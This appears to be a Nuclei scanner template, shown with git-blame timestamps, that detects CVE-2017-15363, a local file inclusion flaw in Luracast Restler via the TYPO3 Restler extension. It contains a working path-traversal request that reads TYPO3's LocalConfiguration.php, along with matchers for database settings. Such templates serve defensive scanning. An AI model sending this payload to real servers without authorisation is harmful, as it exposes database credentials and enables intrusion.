2021-11-08 22:35:51 +00:00
id : CVE-2017-15363
2022-04-22 10:38:41 +00:00
2021-11-08 22:35:51 +00:00
info :
2022-06-09 20:35:21 +00:00
name : Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion
2021-11-08 22:35:51 +00:00
author : 0x_Akoko
severity : high
2022-06-09 20:35:21 +00:00
description : Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 is susceptible to local file inclusion in public/examples/resources/getsource.php. This could allow remote attackers to read arbitrary files via the file parameter.
2021-11-08 22:35:51 +00:00
reference :
- https://www.exploit-db.com/exploits/42985
2022-05-17 09:18:12 +00:00
- https://extensions.typo3.org/extension/restler/
- https://extensions.typo3.org/extension/download/restler/1.7.1/zip/
2022-06-09 20:35:21 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-15363
2021-11-08 22:35:51 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2021-11-08 22:35:51 +00:00
cvss-score : 7.5
cve-id : CVE-2017-15363
2022-05-17 09:18:12 +00:00
cwe-id : CWE-22
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:luracast:restler:*:*:*:*:*:*:*:*
epss-score : 0.04393
2022-08-27 04:41:18 +00:00
tags : cve,cve2017,restler,lfi,edb
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-11-08 22:35:51 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-08 22:35:51 +00:00
- method : GET
path :
- "{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"
matchers-condition : and
matchers :
- type : word
part : body
2021-11-09 16:50:29 +00:00
words :
- "<?php"
- "'host'"
- "'database'"
- "'extConf'"
- "'debug'"
2021-11-08 22:35:51 +00:00
condition : and
- type : status
status :
- 200